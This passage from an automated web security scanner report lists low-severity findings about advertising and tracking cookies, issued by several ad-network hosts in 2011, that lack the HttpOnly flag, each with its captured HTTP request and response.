Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnscc=1303648022

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:41:24 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Pragma: no-cache
Cache-control: no-cache
Content-Length: 43
Content-Type: image/gif
Set-Cookie: cnsuser_id=-621612133; expires=Tue, 24-Apr-2012 22:59:59 GMT; path=/

GIF89a.............!.......,...........D..;

18.163. http://2byto.com/bluepixel/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2byto.com
Path:   /bluepixel/cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bluepixel/cnt-gif1x1.php?e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page HTTP/1.1
Host: 2byto.com
Proxy-Connection: keep-alive
Referer: http://www.dictof.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 12:40:38 GMT
Server: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9
X-Powered-By: PHP/5.2.9
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Location: ./cnt-gif1x1.php?second=1&e=1920.1200&d=16&r=http%3A//kroogy.com/pub/banner_728_90_random.php&p=http%3A//www.dictof.com/&t=Online%20dating%20with%20www.dictof.com%20-%20Front%20page
Content-Length: 31
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Set-Cookie: cnscc=1303648838; expires=Tue, 24-Apr-2012 22:59:59 GMT; path=/

<html><body>Moved</body></html>

18.164. http://a.tribalfusion.com/i.cid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=350803&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ajnvJOOlequ6ZabprMfqfV26NfKOAI7gMhI2SrRuFTy7sA4YRZbRSpuwxALtucRJVryeu8FfS5JQS0stFnbXWVIvrD2BRyJhyD3LRPcAsHrCtGn3fd3NJZdPAQp

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aRnxJ5PME7p7mKvCiExjKLAjBpsnqZceiWcPrfPUdZatasIB1dPc09TGxaSirWQh0IkE9C0EeZdvCFDQJyDQuCjyBgvaIKoP7xkSgVM3UvU4QI73K7U0LSrVZdorDojZdnJY4wk06UhIDZd9G8; path=/; domain=.tribalfusion.com; expires=Sun, 24-Jul-2011 00:52:34 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

18.165. http://ace-tag.advertising.com/action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ace-tag.advertising.com
Path:   /action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /action/type=970862986/bins=1/rich=0/mnum=1516/site=695501/logs=0/betr=crcom967lp_cs=2 HTTP/1.1
Host: ace-tag.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; F1=BwwE02kAAAAABq5CAEAAEBABAAAABAAAAMAAEBA; BASE=RgwqoyEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGAOUajnq9Kr8LAPA72buRiJhbHyGHv70yPsyIf845qx6eWI/QdsmU5nm47UK47HID!; ROLL=boAnv2y2JFBgWE4zf7nzuD5wX65V4u/meZRpXwKuwebwa4PtYFhaQQG!; C2=ZGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpxhVJ9IsuoGH2kQhANZXAcs6OCBMnBwB; GUID=MTMwMzY5MTY3MzsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 00:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Set-Cookie: C2=iGMtN5pqHIxFG/lovgg3sYMBSKMCItdhwgQ3WXIMIMa4FCDCKGehwgQ3gZIM1qKCaMrxEU7qIEysGCTkBgAoNXUWxOCCsRpBx0I9IsfzFv0i4iQBwWcYw6JCvHpxhVJ9IsuoGH2kQhANZXAcs6OCBMnBwRrcIsNrGAH; domain=advertising.com; expires=Wed, 24-Apr-2013 00:34:42 GMT; path=/
Set-Cookie: F1=BIaw02E; domain=advertising.com; expires=Wed, 24-Apr-2013 00:34:42 GMT; path=/
Set-Cookie: ROLL=boAno2yqJFBg26I!; domain=advertising.com; expires=Wed, 24-Apr-2013 00:34:42 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 25 Apr 2011 00:34:42 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

18.166. http://action.mathtag.com/mm//TRAN//red  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://action.mathtag.com
Path:   /mm//TRAN//red

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mm//TRAN//red?nm=TrueCHPg&s0=&s1=&s2=&v0=&v1=&v2=&ri=7069007 HTTP/1.1
Host: action.mathtag.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2769103;type=tui-t329;cat=truec214;ord=1;num=9268942088820.041?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=9:1303494339|3:1303506763|2:1303506773|5:1303494463|10001:1303152836|1:1303494357; ts=1303663821

Response

HTTP/1.1 200 OK
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n1a pid 0x6299 25241
Content-Type: image/gif
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 25 Apr 2011 00:50:21 GMT
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Set-Cookie: ts=1303692621; domain=.mathtag.com; path=/; expires=Tue, 24-Apr-2012 00:50:21 GMT
Content-Length: 43
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: Keep-Alive

GIF89a.............!.......,...........D..;

18.167. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bca52e1b&rnd=78334213420748700&clkurl=http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ../referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUknmntfmI4gkEaJqB02eiFjl3sHgDA3gBY2BgYGZgmhzKwOrwhIFRJ4.B4aPQfyBgYGDUzw9grGZg8rdhYHnhzcCoxcTAcOkZAwMDJ0guTXlWEFDOCirHCJR7AJdTklIHssHAd3MGAwMbAwNLCBMrIxtQWeAtRiYgxZLJyAqklhaAefK7GEGKFMwYGYCCjPrtWZknIfoBAsMbMQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUBmuE9vQaUZPvGEt_WOLrL1FD0BkDA3gBY2BgYGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo357TVwyA9PkUAZWhycMjDp5DAwfhf4DAUguP4CxmoHJ34aB5YU3A6MWEwPDpWcwfWnKs4KAclZQOUag3AO4nJKUOpANBr6bMxgY2BkYAm8xMgEVMRgwMgApBTMwtbQALMiSycgKFGQJYWJlZAMy5HcxMrDBHQc2BgAGbyFK; Domain=.amgdgt.com; Expires=Tue, 24-May-2011 12:29:25 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 4062
Date: Sun, 24 Apr 2011 12:29:24 GMT

_289668_amg_acamp_id=166308;
_289668_amg_pcamp_id=69113;
_289668_amg_location_id=55366;
_289668_amg_creative_id=289668;
_289668_amg_loaded=true;
var _amg_289668_content='<script type="text/javascript"
...[SNIP]...

18.168. http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01 HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://ec.atdmt.com/ds/5RTLCLFLKLFL/v120_myIdentitymyLife_red/160x600_blankJobRed.swf?ver=1&clickTag1=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01&clickTag=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAU7Nu8fjUzYuCAxUtVQiiogKC_QjdnZW8sdXNhLHQsMTMwMzY0Nzk3NDk4OSxjLDI4OTY2OCxwYyw2OTExMyxhYywxNjYzMDgsbyxOMC1TMCxsLDU1MzY2LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1oyWm1abVptQ2tCbVptWm1abVlLUUFBQUFFQXpNd2RBVXJnZWhldFJEMEJTdUI2RjYxRVBRSjI2UU84dFNzSWtTc1lkYTZiMnppWGtGclJOQUFBQUFEOHdBQUMxQUFBQWxnSUFBQUlBQUFER3BBSUEwV01BQUFFQUFBQlZVMFFBVlZORUFLQUFXQUliQzBzQUVBa0JBZ1VDQUFRQUFBQUFpUjdsdEFBQUFBQS4vY25kPSF1UV9LdEFqYzh3SVF4c2tLR0FBZzBjY0JLRXN4TXpNemQtdFJEMEJDQ2dnQUVBQVlBQ0FCS0FGQ0N3aWZSaEFBR0FBZ0F5Z0JRZ3NJbjBZUUFCZ0FJQUlvQVVnQlVBQllteFpnQUdpV0JRLi4vcmVmZXJyZXI9aHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2EucGhwL2NsaWNrZW5jPWh0dHA6Ly9nb29nbGVhZHMuZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJLa2JwNUJhMFRkM3dGb3oybEFlYnlyQ3dDZGZxLU5NQm42Q1U3QmlmeE8zVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjdvT0k4S1BzRW9JQkYyTmhMWEIxWWkwMk9EZzRNRFkxTmpZNE1qa3lOak00b0FIRDh2M3NBN0lCRjNCMVlpNXlaWFJoYVd4bGNpMWhiV0Y2YjI0dWJtVjB1Z0VLTVRZd2VEWXdNRjloYzhnQkNkb0JTV2gwZEhBNkx5OXdkV0l1Y21WMFlXbHNaWEl0WVcxaGVtOXVMbTVsZEM5aVlXNXVaWEpmTVRJd1h6WXdNRjloTG5Cb2NEOXpaV0Z5WTJnOUpUZENKR3RsZVhkdmNtUWxOMFNZQXVRWndBSUV5QUtGMHM4S3FBTUI2QU84QWVnRGxBTDFBd0FBQU1TQUJ1aTN6cXJCanJLRzBRRSZudW09MSZzaWc9QUdpV3F0elhFRGFkZHBmbWk0MWZ6RmhKWFl6MmhuNU8wQSZjbGllbnQ9Y2EtcHViLTY4ODgwNjU2NjgyOTI2MzgmYWR1cmw9Cg--/clkurl=http://clk.atdmt.com/go/253732016/direct;ai.194941096;ct.1/01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
